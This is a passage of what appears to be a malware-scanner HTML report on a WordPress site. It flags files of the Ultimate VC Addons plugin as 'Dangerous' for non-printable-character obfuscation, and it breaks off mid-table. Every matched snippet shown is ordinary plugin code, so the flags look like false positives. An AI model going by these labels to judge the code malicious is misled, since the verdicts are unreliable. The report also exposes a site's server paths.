<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">image_single_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">wp_enqueue_media</span><span style="color: #007700">(); </span><span style="color: #0000BB">wp_enqueue_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_image_single_css'</span><span style="color: #007700">, </span><span style="color: #0000BB">UAVC_URL</span><span style="color: #007700">.</span><span style="color: #DD0000">'admin/vc_extend/css/ultimate_image_single.css'</span><span style="color: #007700">); } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ult_Image_Single'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ult_Image_Single </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ult_Image_Single</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">url</span><span style="color: #007700">, array or </span><span style="color: #0000BB">json</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_attachment_url_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_img_single_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 92</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">image_single_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_354").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Number.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_355" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Number_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Number_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Number_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">number_settings_field</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_355").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Radio_Image.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.25 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_356" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ var </span><span style="color: #0000BB">radio_id </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">parent</span><span style="color: #007700">().</span><span style="color: #0000BB">parent</span><span style="color: #007700">().</span><span style="color: #0000BB">data</span><span style="color: #007700">(</span><span style="color: #DD0000">"uniqid"</span><span style="color: #007700">); var </span><span style="color: #0000BB">val </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">val</span><span style="color: #007700">(); </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #DD0000">"#radio_image_setting_val_"</span><span style="color: #007700">+</span><span style="color: #0000BB">radio_id</span><span style="color: #007700">).</span><span style="color: #0000BB">val</span><span style="color: #007700">(</span><span style="color: #0000BB">val</span><span style="color: #007700">); }); </</span><span style="color: #0000BB">script</span><span style="color: #007700">></span><span style="color: #DD0000">'; return $output; } } } if(class_exists('</span><span style="color: #0000BB">Ultimate_Radio_Image_Param</span><span style="color: #DD0000">')) { $Ultimate_Radio_Image</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">radio_image_settings_field</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_356").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Border.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.50 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_357" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">ultimate_border_param_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) { </span><span style="color: #0000BB">wp_register_style</span><span style="color: #007700">(</span><span style="color: #DD0000">"ultimate-border-style"</span><span style="color: #007700">, </span><span style="color: #0000BB">UAVC_URL</span><span style="color: #007700">.</span><span style="color: #DD0000">'admin/vc_extend/css/ultimate_border.css'</span><span style="color: #007700">); if(</span><span style="color: #0000BB">$hook </span><span style="color: #007700">== </span><span style="color: #DD0000">"post.php" </span><span style="color: #007700">|| </span><span style="color: #0000BB">$hook </span><span style="color: #007700">== </span><span style="color: #DD0000">"post-new.php"</span><span style="color: #007700">){ </span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">(</span><span style="color: #DD0000">'dev_mode'</span><span style="color: #007700">); if( </span><span style="color: #0000BB">$bsf_</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 207</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 209</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_border_radius_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #FF8000">/*$mode,*/ </span><span style="color: #0000BB">$unit</span><span style="color: #007700">,</span><span style="color: #FF8000">/* $default_value,*/</span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$placeholder</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_border_param_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #FF8000">/*$mode,*/ </span><span style="color: #0000BB">$unit</span><span style="color: #007700">,</span><span style="color: #FF8000">/* $default_value,*/</span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$id</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_border_param_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_border_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_357").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/includes/system-info.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.00 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_358" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_systeminfo</span><span style="color: #007700">() { </span><span style="color: #0000BB">$table </span><span style="color: #007700">= </span><span style="color: #DD0000">'<div class="bsf-system-info-wrapper">'</span><span style="color: #007700">; </span><span style="color: #0000BB">ob_start</span><span style="color: #007700">(); </span><span style="color: #0000BB">bsf_systeminfo</span><span style="color: #007700">(); </span><span style="color: #0000BB">$table </span><span style="color: #007700">.= </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">(); </span><span style="color: #0000BB">$table </span><span style="color: #007700">.= </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; return </span><span style="color: #0000BB">$table</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 122</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'phpversion' </span><span style="color: #007700">) ) ? </span><span style="color: #0000BB">phpversion</span><span style="color: #007700">() : </span><span style="color: #DD0000">'Not sure'</span><span style="color: #007700">; </span><span style="color: #0000BB">?></span></td></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'curl_version' </span><span style="color: #007700">) ) ? </span><span style="color: #DD0000">'bsf-alert' </span><span style="color: #007700">: </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">?></span>"></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 178</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'curl_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 269</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_systeminfo</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$table</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'memory_get_usage' </span><span style="color: #007700">) ? </span><span style="color: #0000BB">round</span><span style="color: #007700">( </span><span style="color: #0000BB">memory_get_usage</span><span style="color: #007700">() / </span><span style="color: #0000BB">1024 </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2 </span><span style="color: #007700">) : </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_systeminfo</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_358").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/includes/helpers.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 29</span><br><table id="file_359" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return; } echo </span><span style="color: #DD0000">'<div class="notice notice-error uct-notice is-dismissible"><p>'</span><span style="color: #007700">; </span><span style="color: #0000BB">printf</span><span style="color: #007700">( </span><span style="color: #0000BB">__</span><span style="color: #007700">( </span><span style="color: #DD0000">'Looks like you are on a WordPress Multisite, you will need to install and network activate %1$s Brainstorm Updater for Multisite %2$s plugin. Download it from %3$s here %4</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'brainstorm_get_all_products' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">brainstorm_get_all_products</span><span style="color: #007700">( </span><span style="color: #0000BB">$skip_plugins </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$skip_themes </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$skip_bundled </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
